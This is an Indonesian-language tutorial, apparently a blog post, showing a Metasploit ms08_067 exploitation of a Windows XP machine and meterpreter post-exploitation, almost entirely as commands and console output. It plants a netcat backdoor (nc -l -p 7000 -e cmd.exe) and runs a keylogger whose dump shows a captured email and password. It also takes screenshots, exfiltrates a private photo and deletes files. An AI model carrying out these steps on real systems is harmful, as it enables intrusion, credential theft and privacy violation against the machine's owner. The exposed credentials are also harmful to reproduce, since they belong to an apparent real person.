Disini pembahasan meterpreter untuk metasploit framework lebih jauh dibandingkan artikel sebelumnya, baiklah kita langsung saja, diasumsikan target kita adalah Windows XP dengan celah SMB.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 97 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 97 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf >
Kita untuk mencari exploit-exploit dapat dengan perintah show exploits, disini kita persempit saja targetnya diasumsikan kita akan menggunakan exploit untuk microsoft bulletin tahun 2008.
msf > search ms08
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/ms/ms08_059_his2006 2008-10-14 normal Microsoft Host Integration Server 2006 Command Execution Vulnerability
exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 normal Internet Explorer Data Binding Memory Corruption
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
Dari pencarian didapat 7 exploit untuk ms08, kita gunakan saja ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
Untuk mengetahui exploit kita mendukung untuk target apa maka kita dapat masukkan perintah dibawah ini
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
14 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
15 Windows XP SP2 Chinese - Simplified (NX)
16 Windows XP SP2 Chinese - Traditional (NX)
17 Windows XP SP2 Czech (NX)
18 Windows XP SP2 Danish (NX)
19 Windows XP SP2 German (NX)
20 Windows XP SP2 Greek (NX)
21 Windows XP SP2 Spanish (NX)
22 Windows XP SP2 Finnish (NX)
23 Windows XP SP2 French (NX)
24 Windows XP SP2 Hebrew (NX)
25 Windows XP SP2 Hungarian (NX)
26 Windows XP SP2 Italian (NX)
27 Windows XP SP2 Japanese (NX)
28 Windows XP SP2 Korean (NX)
29 Windows XP SP2 Dutch (NX)
30 Windows XP SP2 Norwegian (NX)
31 Windows XP SP2 Polish (NX)
32 Windows XP SP2 Portuguese - Brazilian (NX)
33 Windows XP SP2 Portuguese (NX)
34 Windows XP SP2 Russian (NX)
35 Windows XP SP2 Swedish (NX)
36 Windows XP SP2 Turkish (NX)
37 Windows XP SP3 Arabic (NX)
38 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
39 Windows XP SP3 Chinese - Simplified (NX)
40 Windows XP SP3 Chinese - Traditional (NX)
41 Windows XP SP3 Czech (NX)
42 Windows XP SP3 Danish (NX)
43 Windows XP SP3 German (NX)
44 Windows XP SP3 Greek (NX)
45 Windows XP SP3 Spanish (NX)
46 Windows XP SP3 Finnish (NX)
47 Windows XP SP3 French (NX)
48 Windows XP SP3 Hebrew (NX)
49 Windows XP SP3 Hungarian (NX)
50 Windows XP SP3 Italian (NX)
51 Windows XP SP3 Japanese (NX)
52 Windows XP SP3 Korean (NX)
53 Windows XP SP3 Dutch (NX)
54 Windows XP SP3 Norwegian (NX)
55 Windows XP SP3 Polish (NX)
56 Windows XP SP3 Portuguese - Brazilian (NX)
57 Windows XP SP3 Portuguese (NX)
58 Windows XP SP3 Russian (NX)
59 Windows XP SP3 Swedish (NX)
60 Windows XP SP3 Turkish (NX)
61 Windows 2003 SP2 Japanese (NO NX)
Kita pilih 0 yaitu Automatic Targeting.
msf exploit(ms08_067_netapi) > set target 0
target => 0
Jika kita tidak melakukan target maka secara default tetap diset target 0, diatas hanya sebagai informasi saja jika misalkan anda menggunakan metasploit yang berbeda yang membutuhkan target spesifik.
Setelah kita memilih target 0 maka kita tampilkan payload, payload disini fungsinya kita memilih exploitasi kita ingin seperti apa, misal shell? remote desktop dengan VNC? download & execute?
Perintah untuk menampilkan payloads untuk exploit ini
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/adduser normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
Ternyata banyak juga, disini kita gunakan meterpreter saja karena praktek kita disini adalah meterpreter
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
Setelah kita set payloadnya menggunakan windows/meterpreter/bind_tcp maka kita set target kita, perintahnya adalah :
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.39
PAYLOAD => windows/meterpreter/bind_tcp
RHOST => 192.168.1.39
Setelah semua sudah dimasukkan tinggal kita lakukan exploitasi langsung dengan perintah exploit
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to 192.168.1.39
msf exploit(ms08_067_netapi) > exploit
[*] Meterpreter session 1 opened (192.168.1.30:1602 -> 192.168.1.39:4444) at 2011-11-06 06:49:29 +0700
Binggo, kita sudah masuk di meterpreter.
Untuk mengetahui kita direktori mana di target kita masukkan perintah pwd.
>>>pwd
C:\WINDOWS\system32
Untuk mengetahui posisi kita di komputer sendiri, perintahnya adalah getlwd.
>>>getlwd
C:/Program Files/Rapid7/framework/msf3
Untuk mengetahui nama komputer target, informasi OS, arsitektur, sistem bahasa yang digunakan.
>>>sysinfo
Computer : PC100
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
Untuk mengetahui route dari komputer target
>>>route
Network routes
==============
Subnet Netmask Gateway
—— ——- ——-
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.39
192.168.1.39 255.255.255.255 127.0.0.1
192.168.1.255 255.255.255.255 192.168.1.39
224.0.0.0 240.0.0.0 192.168.1.39
255.255.255.255 255.255.255.255 192.168.1.39
Untuk keluar satu direktori ke bawah
>>>cd ..
Perintah diatas mirip dilinux, bukan command prompt, karena menggunakan spasi untuk pembatas cd dan ..
Untuk membuktikkan kita sudah berada c:\windows adalah
>>>pwd
C:\WINDOWS
Ok, kita masuk ke c:\
>>>cd ..
Untuk menampilkan files dan direktori-direktori maka gunakan ls
>>>ls
Listing: C:\
============
Mode Size Type Last modified Name
—- —- —- ————- —-
100666/rw-rw-rw- 16299862 fil 2011-07-31 19:05:32 +0700 $Persi0.sys
100777/rwxrwxrwx 0 fil 2011-07-31 09:53:39 +0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2011-07-31 09:53:39 +0700 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2011-07-31 11:14:57 +0700 Documents and Settings
100444/r–r–r– 0 fil 2011-07-31 09:53:39 +0700 IO.SYS
100444/r–r–r– 0 fil 2011-07-31 09:53:39 +0700 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 04:13:04 +0700 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2011-09-17 20:36:28 +0700 Program Files
40777/rwxrwxrwx 0 dir 2011-07-31 11:13:25 +0700 System Volume Information
40777/rwxrwxrwx 0 dir 2011-07-31 19:05:25 +0700 WINDOWS
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:42 +0700 Xitami
100666/rw-rw-rw- 211 fil 2011-07-31 09:44:42 +0700 boot.ini
100666/rw-rw-rw- 0 fil 2011-07-31 19:05:13 +0700 dfinstall.log
100444/r–r–r– 250048 fil 2008-04-14 06:01:44 +0700 ntldr
100666/rw-rw-rw- 301989888 fil 2011-11-06 19:55:04 +0700 pagefile.sys
Kita coba masuk direktori xitami
>>>cd xitami
Tampilkan isi pada direktori xitami
>>>ls
Listing: C:\xitami
==================
Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:42 +0700 .
40777/rwxrwxrwx 0 dir 1980-01-01 15:00:00 +0700 ..
100666/rw-rw-rw- 6772 fil 2011-07-31 18:18:44 +0700 INSTALL.LOG
100777/rwxrwxrwx 81296 fil 1997-04-29 23:57:12 +0700 UNWISE.EXE
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:31 +0700 addons
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:32 +0700 cgi-bin
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:30 +0700 cgi-src
100666/rw-rw-rw- 8268 fil 2000-03-31 05:45:26 +0700 ddnsdef.xml
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:31 +0700 debug
100666/rw-rw-rw- 92 fil 2011-07-31 18:18:35 +0700 defaults.aut
100666/rw-rw-rw- 134 fil 2011-07-31 18:18:35 +0700 defaults.cfg
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:29 +0700 errors
100666/rw-rw-rw- 148 fil 1998-06-26 11:37:22 +0700 ftpadios.txt
100666/rw-rw-rw- 1303 fil 1998-08-05 07:20:28 +0700 ftpdirs.aut
100666/rw-rw-rw- 729 fil 1997-12-20 06:31:24 +0700 ftphello.txt
100666/rw-rw-rw- 1334 fil 1998-02-24 10:34:52 +0700 ftplogin.txt
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:28 +0700 ftproot
100666/rw-rw-rw- 1694 fil 1999-09-01 00:43:00 +0700 ftpusers.aut
100777/rwxrwxrwx 155648 fil 2000-04-22 10:34:26 +0700 gslgen.exe
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:31 +0700 headers
100666/rw-rw-rw- 5194 fil 2000-01-02 10:23:10 +0700 license.txt
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:42 +0700 logs
100666/rw-rw-rw- 15146 fil 2000-01-02 10:23:18 +0700 perlssi
100666/rw-rw-rw- 2628 fil 1999-12-08 12:24:48 +0700 pipedef.xml
100666/rw-rw-rw- 1335 fil 1998-10-14 11:05:58 +0700 readme.txt
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:31 +0700 temp
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:30 +0700 templates
40777/rwxrwxrwx 0 dir 2011-07-31 18:18:24 +0700 webpages
100666/rw-rw-rw- 940 fil 1999-06-05 00:38:24 +0700 xitami.aut
100666/rw-rw-rw- 64764 fil 2000-04-02 06:28:50 +0700 xitami.cfg
100777/rwxrwxrwx 704512 fil 2000-04-22 10:37:46 +0700 xiwin32.exe
100777/rwxrwxrwx 126976 fil 2000-04-21 09:44:36 +0700 xixlat.exe
Diatas ada file ftphello.txt, kita dapat menggunakan perintah cat untuk melihat isinya, sama dengan perintah di linux yaitu cat, contoh menjalankannya :
>>>cat ftphello.txt
# This is the welcome text file for the FTP service.
# Lines starting with ‘#’ are ignored.
# You can change this file, or (better) copy it and change the
# ftp:welcome option.
#
XX XXX XXX XXXXXXXXX X XX XX XXX ————–
- X– X— X—– X—- XX——- XX– XX– X— www.imatix.com –
– X X—- X—– X—- X X—— X X X X– X— (c) 1991-98 –
— X—– X—– X—- X- X—– X- X- X– X— –
– X X—- X—– X—- XXXXX—- X—- X– X— Windows – OS/2 –
- X– X— X—– X—- X— X— X—- X– X— UNIX – OpenVMS –
XXX XX XXX XXX XXX XXX XXX XXX XXX ————–
Ready for login. All accesses to this server are logged.
Oke, sekarang kita coba pasang backdoor dengan netcat, untuk pertama-tama kita copy dulu nc.exe dari komputer kita ke komputer target melalui fitur upload yang ada di meterpreter.
>>>upload -r c:/asa/nc.exe c:/xitami
[*] uploading : c:/asa/nc.exe -> c:/xitami
[*] uploaded : c:/asa/nc.exe -> c:/xitami\nc.exe
Setelah diupload kita masuk aja ke shell.
>>>shell
Process 1116 created.
Channel 15 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\xitami>
Setelah kita sudah di shell, kita masukkan perintah dibawah ini untuk membuka port 7000 untuk mengakses cmd di komputer target lewat jaringan.
C:\xitami>
>>>nc -l -p 7000 -e cmd.exe
nc -l -p 7000 -e cmd.exe
Setelah itu kita masuk ke komputer kita, kita gunakan perintah seperti ini di komputer kita.
Oke, kita lanjutkan.
Sekarang kita akan mencoba memasang keylogger di komputer target.
Pertama-tama kita tampilan proses di komputer target dengan ls.
>>>ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
624 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
696 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
720 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
764 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
776 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
936 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1068 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1152 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1292 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1452 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1532 explorer.exe x86 0 PC100\data C:\WINDOWS\Explorer.EXE
1648 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1184 wscntfy.exe x86 0 PC100\data C:\WINDOWS\system32\wscntfy.exe
1300 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1760 xiwin32.exe x86 0 PC100\data C:\Xitami\xiwin32.exe
348 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2032 cmd.exe x86 0 PC100\data C:\WINDOWS\system32\cmd.exe
Perhatikan diatas explorer.exe ada di PID 1532, disini kita lakukan migrate ke PID 1532, perintahnya :
>>>migrate 1532
[*] Migrating to 1532…
[*] Migration completed successfully.
Setelah itu kita cek dengan perintah getpid untuk mengetahui hasil migrate kita tadi.
>>>getpid
Current pid: 1532
Setelah sudah sesuai maka kita aktifkan keylogger di komputer target dengan perintah keyscan_start.
>>>keyscan_start
Starting the keystroke sniffer…
Untuk melihat hasil dari keylogger adalah :
>>>keyscan_dump
Dumping captured keystrokes…
backup password <Return> username : cew_saturnus1987@yahooc <Back> .com <Return> password : adaajadeh <Return> <Return>
Binggo, hasil kita menyadap apa yang diketikkan oleh target telah tampil diatas.
Sekarang kita coba tampilkan screenshoot dikomputer target dengan perintah sebagai berikut
meterpreter > use espia
Loading extension espia…
success.
kita jalankan screengrab
meterpreter > screengrab
Screenshot saved to: C:/Program Files/Rapid7/framework/msf3/eJPgTrhD.jpeg
Binggo hasil kita melakukan capture screenshoot komputer target telah disimpan di komputer kita.
Sekarang kita coba praktek mencari file ekstensi tertentu dengan meterpreter.
meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.
OPTIONS:
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)
meterpreter > search -f *.jpg
Found 151 results…
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (28521 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (71189 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (83794 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (105542 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Clear Day Bkgrd.jpg (5675 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Fiesta Bkgrd.jpg (5048 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Glacier Bkgrd.jpg (2743 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Leaves Bkgrd.jpg (4389 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Maize Bkgrd.jpg (11748 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Nature Bkgrd.jpg (3781 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Pie Charts Bkgrd.jpg (2371 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Sunflower Bkgrd.jpg (17147 bytes)
c:\\Program Files\Messenger\fotorahasia.JPG (3263 bytes)
..
Kelebihan menggunakan search dari meterpreter maka search yang dilakukan mampu menembus drive-drive di harddisk, beda dengan dir/s *.jpg yang dimana dijalankan di c:\ misalnya maka pencarian hanya mencari *.jpg di drive c saja.
Kita coba praktekkan mengambil file fotorahasia.JPG, perintahnya adalah
meterpreter > download -r c:/progra~1/messenger/fotorahasia.JPG c:/asa
[*] downloading: c:/progra~1/messenger/fotorahasia.JPG -> c:/asa/fotorahasia.JPG
[*] downloaded : c:/progra~1/messenger/fotorahasia.JPG -> c:/asa/fotorahasia.JPG
File fotorahasia.JPG telah tercopy ke c:\asa.
Kita coba-coba lagi perintah sederhana untuk alternatif selain pakai shell, kita masuk ke c:\program files\messenger untuk menghapus file fotorahasia.JPG, langkah perintahnya sebagai berikut
meterpreter > cd ,,
meterpreter > cd progra~1
meterpreter > cd messenger
meterpreter > pwd
C:\progra~1\messenger
Setelah berada di c:\program files\messenger maka kita dapat tampilkan files didalamnya :
meterpreter > ls
Listing: C:\progra~1\messenger
==============================
Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir 2011-11-07 05:29:29 +0700 .
40555/r-xr-xr-x 0 dir 2011-09-17 20:36:28 +0700 ..
100666/rw-rw-rw- 33792 fil 2008-04-14 11:41:52 +0700 custsat.dll
100666/rw-rw-rw- 3263 fil 2011-11-07 05:27:50 +0700 fotorahasia.JPG
100444/r–r–r– 4821 fil 2007-04-03 05:37:24 +0700 logowin.gif
100666/rw-rw-rw- 7047 fil 2007-04-03 12:37:24 +0700 lvback.gif
100666/rw-rw-rw- 82944 fil 2008-04-14 18:42:00 +0700 msgsc.dll
100666/rw-rw-rw- 180224 fil 2008-04-14 12:00:30 +0700 msgslang.dll
100777/rwxrwxrwx 1695232 fil 2008-04-14 18:42:30 +0700 msmsgs.exe
100666/rw-rw-rw- 9306 fil 2001-08-23 20:00:00 +0700 newalert.wav
100666/rw-rw-rw- 18052 fil 2001-08-23 20:00:00 +0700 newemail.wav
100666/rw-rw-rw- 9306 fil 2001-08-23 20:00:00 +0700 online.wav
100666/rw-rw-rw- 4454 fil 2007-04-03 12:37:28 +0700 type.wav
100666/rw-rw-rw- 115981 fil 2007-04-03 12:34:02 +0700 xpmsgr.chm
Kita perhatikan ada file fotorahahasia.JPG, untuk menghapusnya kita dapat menggunakan rm.
meterpreter > rm fotorahasia.JPG
Hasilnya adalah setelah kita lakukan perintah diatas adalah :
meterpreter > ls
Listing: C:\progra~1\messenger
==============================
Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir 2011-11-07 05:48:35 +0700 .
40555/r-xr-xr-x 0 dir 2011-09-17 20:36:28 +0700 ..
100666/rw-rw-rw- 33792 fil 2008-04-14 11:41:52 +0700 custsat.dll
100444/r–r–r– 4821 fil 2007-04-03 05:37:24 +0700 logowin.gif
100666/rw-rw-rw- 7047 fil 2007-04-03 12:37:24 +0700 lvback.gif
100666/rw-rw-rw- 82944 fil 2008-04-14 18:42:00 +0700 msgsc.dll
100666/rw-rw-rw- 180224 fil 2008-04-14 12:00:30 +0700 msgslang.dll
100777/rwxrwxrwx 1695232 fil 2008-04-14 18:42:30 +0700 msmsgs.exe
100666/rw-rw-rw- 9306 fil 2001-08-23 20:00:00 +0700 newalert.wav
100666/rw-rw-rw- 18052 fil 2001-08-23 20:00:00 +0700 newemail.wav
